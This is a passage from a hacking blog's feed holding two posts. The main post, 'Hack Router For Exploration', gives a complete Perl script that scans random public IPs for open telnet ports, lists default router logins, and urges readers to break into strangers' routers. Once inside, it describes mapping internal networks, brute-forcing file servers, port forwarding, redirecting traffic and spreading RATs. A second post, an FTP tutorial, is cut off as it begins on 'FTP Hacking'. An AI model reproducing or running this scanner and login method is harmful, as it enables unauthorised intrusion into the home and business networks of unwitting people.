</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/4677470412818405423/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/creating-truly-skinnable-web-sites.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/4677470412818405423'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/4677470412818405423'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/creating-truly-skinnable-web-sites.html' title='Creating Truly Skinnable Web Sites (ver.1.0.0)'/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-5453062331594115838</id><published>2013-01-05T05:48:00.000-08:00</published><updated>2013-07-28T01:56:47.086-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="hacking a router"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="Network Hacks"/><category scheme="http://www.blogger.com/atom/ns#" term="router hacks"/><title type='text'>Hack Router For Exploration</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #595543; font-family: Arial, verdana, Tahoma, &#39;Century gothic&#39;, sans-serif;&quot;&gt;&lt;span style=&quot;color: red; font-size: 13px; line-height: 19px;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;EMOTE ROUTER HACKING&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.clker.com/cliparts/8/f/9/a/11949856431316298822router_joeseph_teed_01.svg.thumb.png&quot; style=&quot;clear: left; color: #1d81b6; float: left; margin-bottom: 1em; margin-right: 1em; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://www.clker.com/cliparts/8/f/9/a/11949856431316298822router_joeseph_teed_01.svg.thumb.png&quot; style=&quot;border: 1px solid rgb(212, 215, 222); margin: 4px 0px 10px; padding: 5px;&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;color: red; font-size: 13px; line-height: 19px;&quot;&gt;Introduction&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 18.999988555908203px;&quot;&gt;In my previous posts i have explained &lt;a href=&quot;http://hackerx-malik.blogspot.com/2013/01/hack-ip-address.html&quot;&gt;how to hack PC using IP address&lt;/a&gt; and &lt;a href=&quot;http://hackerx-malik.blogspot.com/2013/01/how-to-hack-victims-computer-with-nmap.html&quot;&gt;how to hack someone&#39;s PC using NMAP(Networking Tool)&lt;/a&gt;. In this post i will explain about router hacking. OK&lt;/span&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;, Basically this tutorial deals with how to scan large amounts of 
addresses for telnet services, which we can then attempt to use default 
credentials to log in with surprising success.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: red; font-size: 13px; line-height: 19px;&quot;&gt;Why Telnet? Isn&#39;t That Dead Now?&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Your partly correct, telnet is dead now, it was superseded by SSH 
because telnet sends packets in plain text where as SSH encrypts 
packets. But telnet is still very much used on routers for simple 
administration by low tech management systems that come packaged with 
a lot of off the shelf routers. Some of these routers allow remote 
clients to connect to telnet as well as local users - these are the 
boxes that we are looking for.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: red; font-size: 13px; line-height: 19px;&quot;&gt;So what do i need ?&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
You&#39;ll need to run this&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;line-height: 18.999988555908203px;&quot;&gt;Perl&lt;/span&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&amp;nbsp;script, (written by me, found below), this 
simply generates a random IP address, if the IP is in a scannable class 
(ie not a private, experimental or loop back address) the&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;line-height: 18.999988555908203px;&quot;&gt;program&lt;/span&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&amp;nbsp;attempts to open a connection to the telnet port (23) of the random ip, 
if it succeeds the program logs the success in a local file for later 
analysis. The program then repeats -- so if you run a few instances of 
the program for a few hours you can end up with a list of around 200 
telnet servers - i have left mine overnight before and collected 880 
servers before.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;codeblock&quot;&gt;
&lt;div class=&quot;title&quot;&gt;
Code:&lt;/div&gt;
&lt;div class=&quot;body&quot; dir=&quot;ltr&quot;&gt;
&lt;code&gt;#!/usr/bin/perl&lt;br /&gt;
use IO::Socket;&lt;br /&gt;
########################### IP GENERATOR ########################&lt;br /&gt;
sub ipgen(){&lt;br /&gt;
my $range1 = 223;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;#avoid experimental and multicast&lt;br /&gt;
my $range2 = 254;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br /&gt;
$oct1 = int(rand($range1)) + 1;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;#generate random&amp;nbsp;octets&lt;br /&gt;
$oct2 = int(rand($range2)) + 1;&lt;br /&gt;
$oct3 = int(rand($range2)) + 1;&lt;br /&gt;
$oct4 = int(rand($range2)) + 1;&lt;br /&gt;
&lt;br /&gt;
if($oct1 == 127 || $oct1 == 172 || $oct1 == 192 || $oct1 == 10){#if gets rid of loopbacks and private ips&lt;br /&gt;
$ip = &amp;amp;ipgen();&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;#if local or private call again&lt;br /&gt;
}else{&lt;br /&gt;
$ip = &quot;$oct1.$oct2.$oct3.$oct4&quot;;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# otherwise allocate the ip to return&lt;br /&gt;
}&lt;br /&gt;
return $ip;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;#return to caller&lt;br /&gt;
}&lt;br /&gt;
#################################################################&lt;br /&gt;
############################## MAIN #############################&lt;br /&gt;
print &quot;########################################\n&quot;;&lt;br /&gt;
print &quot;#---------Random Telnet Scanner--------#\n&quot;;&lt;br /&gt;
print &quot;#-----------Written by 50LaR15---------#\n&quot;;&lt;br /&gt;
print &quot;########################################\n&quot;;&lt;br /&gt;
while(1==1){&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# keeps code running indefinately&lt;br /&gt;
$target = &amp;amp;ipgen();&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# get random ip to scan&lt;br /&gt;
print &quot;*??* SCANNING: $target \n&quot;;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# output&lt;br /&gt;
my $sock = new IO::Socket::INET (&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# try to create socket to chose random address&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; PeerAddr =&amp;gt; $target,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; PeerPort =&amp;gt; &#39;23&#39;,&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# change this number to change ports you want to detect&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Proto =&amp;gt; &#39;tcp&#39;,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Timeout =&amp;gt; &#39;3&#39;,&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; # you can get away with a timeout of 1 second but i have 2 to be safe&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; );&lt;br /&gt;
if($sock){&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# if socket opened (port open)&lt;br /&gt;
print &quot;*!!* SUCCESS-: $target \n&quot;;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# print to screen&lt;br /&gt;
open(DAT, &quot;&amp;gt;&amp;gt;telnet.txt&quot;) || die(&quot;Cannot Open Output File&quot;);&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; # open results file&lt;br /&gt;
print DAT &quot;SUCCESS: $target \n&quot;;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# append findings to end of file&lt;br /&gt;
close(DAT);&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# close the file&lt;br /&gt;
}&lt;br /&gt;
close($sock);&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# close the socket&lt;br /&gt;
}################################################################&lt;/code&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;br /&gt;
You&#39;ll also need need a telnet client - I recommend you use putty because
 it supports&amp;nbsp;proxy&#39;s&amp;nbsp; but you are dealing with people who&amp;nbsp;don&#39;t&amp;nbsp;know how 
to change there router passwords so you&amp;nbsp;shouldn&#39;t&amp;nbsp;be too worried so you 
can use the&amp;nbsp;default&amp;nbsp;OS telnet client - for windows XP/linux users you 
will already have one - for windows 7 users you will need to enable 
yours.&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: red;&quot;&gt;Ok - I&#39;m Set Up - So Now What?&lt;/span&gt;&lt;br /&gt;
You&#39;ll need to start a few instances of the&amp;nbsp;Perl&amp;nbsp;script, you can make your desktop look pretty like mine below if you wish.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt=&quot;[Image: 4185786.png]&quot; border=&quot;0&quot; src=&quot;http://www3.picturepush.com/photo/a/4185786/220/4185786.png&quot; style=&quot;border: 1px solid rgb(212, 215, 222); margin: 4px 0px 10px; padding: 5px;&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
You can just run one but it will take longer to get a decent sized list 
of servers. I run 5 for around half an hour and that gives me a list of 
around 50 telnet boxes.&lt;br /&gt;
&lt;br /&gt;
OK now you have your list of IP&#39;s with the telnet port open (called 
telnet.txt in the same directory as your&amp;nbsp;Perl&amp;nbsp;script), what you need to 
do is take your telnet client and just start connecting to them, - you 
will be prompted for a username + password.&lt;br /&gt;
&lt;br /&gt;
This is where it gets fun - because&amp;nbsp;a large&amp;nbsp;amount of routers ship with default accounts - here are the most common.&lt;br /&gt;
&lt;br /&gt;
Username:Password&lt;br /&gt;
_________________&lt;br /&gt;
admin : admin&lt;br /&gt;
admin : (blank password)&lt;br /&gt;
root : (blank)&lt;br /&gt;
root : root&lt;br /&gt;
&lt;br /&gt;
To be honest a lot of routers disclose there model number in the telnet 
banner when you connect so a simple&amp;nbsp;Google&amp;nbsp;search often turns up the 
default username and password. Otherwise i try the top 3 and usually get
 disconnected and move on to the next in my list.&lt;br /&gt;
&lt;br /&gt;
You will find out quiet fast how many ip&#39;s in your list you can actually log into with full admin rights&lt;br /&gt;
&lt;br /&gt;
&lt;img alt=&quot;[Image: 4185900.png]&quot; border=&quot;0&quot; src=&quot;http://www2.picturepush.com/photo/a/4185900/220/4185900.png&quot; style=&quot;border: 1px solid rgb(212, 215, 222); margin: 4px 0px 10px; padding: 5px;&quot; /&gt;&lt;br /&gt;
&lt;span style=&quot;color: red;&quot;&gt;Who Exactly Am I Hacking?&lt;/span&gt;&lt;br /&gt;
This is half the fun for me - you&amp;nbsp;don&#39;t&amp;nbsp;really know - if your interested 
you can just do a quick whois -but around 90% of the time your dealing 
with home routers that people have bought from a shop and not configured
 properly but i have found business and offices that have succumb to the
 same laziness as the home user so the possibilities are endless.&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: red;&quot;&gt;Ok now what ?&lt;/span&gt;&lt;br /&gt;
From here its up to you what you do, but i enjoy using simple network 
tools like ipconfig and ping to map out the network, sometimes i have 
found routers that have nmap and telnet clients on etc. Today i found 
one that let me download any C code onto it i wanted - almost every 
router OS is different so some take a while to get used to what commands
 you can run but it is a lot of fun finding out peoples network layout, i
 have compromised routers, made my way into the internal file servers of
 the network using brute forcers, or setting up port forwarding on the 
router to give me access externally to otherwise private internal 
resources - you can even port forward packets to printers and use them 
across the internet to print out hundreds of copies of the dictionary or 
what ever literature tickles your pickle.&lt;br /&gt;
&lt;br /&gt;
A funny concept that i have got to work in the past is fucking with the 
routing tables and redirecting every web request to gay porn sites. So I
 would imagine that this could be useful for people trying to get RAT&#39;s 
spread, especially if you find a router with upwards of 100 PC&#39;s behind 
the router - but i&amp;nbsp;don&#39;t&amp;nbsp;deal much with rat&#39;s and botnets so&amp;nbsp;don&#39;t&amp;nbsp;quote 
me on that.&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: red;&quot;&gt;A Small Aside.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Ill be happy if a few people read this tutorial and explore a few 
networks because&amp;nbsp;that&#39;s&amp;nbsp;what used to drive hacking forwards, and its what
 used to motivate hackers, the thrill of exploring the unknown, the 
chance of coming across a really large network to explore and further 
your knowledge and skills of systems. I think people focus too much on 
making money from hacking, or getting there best friends fu**book 
password and the real fun somehow has been lost in the past 10 years to a
 new generation of kids that just want everything now. Lets keep some of
 the old skills and knowledge alive and not let it be lost in the 
archives of long since abandoned forums and irc rooms.&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/5453062331594115838/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/hack-router-for-exploration.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/5453062331594115838'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/5453062331594115838'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/hack-router-for-exploration.html' title='Hack Router For Exploration'/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-1696556758565509685</id><published>2013-01-05T05:46:00.001-08:00</published><updated>2013-07-28T02:01:26.768-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="configuring a website"/><category scheme="http://www.blogger.com/atom/ns#" term="FTP tutorial"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><title type='text'>The FTP Tutorial</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #595543; font-family: Arial, verdana, Tahoma, &#39;Century gothic&#39;, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;In my previous posts i will explained about &lt;a href=&quot;http://hackerx-malik.blogspot.com/2013/01/hack-website-using-remote-file-inclusion.html&quot;&gt;hacking&amp;nbsp;&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;line-height: 18.999988555908203px;&quot;&gt;&lt;a href=&quot;http://hackerx-malik.blogspot.com/2013/01/hack-website-using-remote-file-inclusion.html&quot;&gt;a stable&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;a href=&quot;http://hackerx-malik.blogspot.com/2013/01/hack-website-using-remote-file-inclusion.html&quot;&gt;&amp;nbsp;website&lt;/a&gt; and also &lt;a href=&quot;http://hackerx-malik.blogspot.com/2013/01/hack-ip-address.html&quot;&gt;hacking on networks&lt;/a&gt;. Today i will explained you about File Transfer&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;line-height: 18.999988555908203px;&quot;&gt;Protocol&lt;/span&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&amp;nbsp;(FTP) so you can easily manage and create your own website and understand about the control panel in&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;line-height: 18.999988555908203px;&quot;&gt;web servers&lt;/span&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
What Is FTP and What Is It Good For?&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
------------------------------------&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
The word FTP (see footnote 1 below) stands for File Transfer Protocol(1).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
FTP servers will let you to both download (retrieve a file from the 
server) and upload (send a file to the server) files from the server 
with great ease (if you have permission to do so).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
You browse through a remote FTP site the same way you browse through 
your own computer&#39;s files and directories (of course, you don&#39;t have 
read and/or write access to every file on the system, and some files you
 can&#39;t even see).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
FTP Commands&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
------------&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
The following are several basic FTP commands. To communicate with FTP 
daemons(7), connect to port(2) 21 and then use the following commands 
(see footnote 2 below) to communicate with the FTP server:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
cd&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; change directory (on the server)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
lcd&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; change local directory (when sending a file, the path(4) of the specified file will be the path you specify on lcd)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
dir,ls&amp;nbsp; directory listing&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
binary&amp;nbsp; change mode to binary transfer&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
get&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; retrieve a file&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
mget&amp;nbsp;&amp;nbsp;&amp;nbsp; retrieve many files&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
put&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; send a file&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
mput&amp;nbsp;&amp;nbsp;&amp;nbsp; send many files&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
pwd&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; print working directory on the server&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Footnotes&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
+++++++++&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
1. For thousands of computer-related acronyms and abbreviations head to 
blacksun.box.sk and download the file called acros.txt from the projects
 page.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
2. If you don&#39;t feel like typing stupid commands, there are lots of FTP 
clients(5) who will do all the work for you, but fortunately some will 
still show you all the commands they use so you&#39;ll be able to learn new 
commands.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
You can download FTP clients for every Operating System from TUCOWS. 
Simply go to the nearest TUCOWS mirror site(3) or go directly to &lt;/span&gt;&lt;/span&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.tucows.com/&quot; style=&quot;font-size: 13px; line-height: 19px;&quot; title=&quot;Linkification: http://www.tucows.com&quot;&gt;www.tucows.com&lt;/a&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
FTP Hacking&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
-----------&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
Since there are so many FTP holes for so many FTP server programs and so
 many Operating Systems, I decided that the best way it simply to 
explain to you how to find information about security holes by yourself.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
I will also introduce several interesting FTP security holes near the end of this section.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;
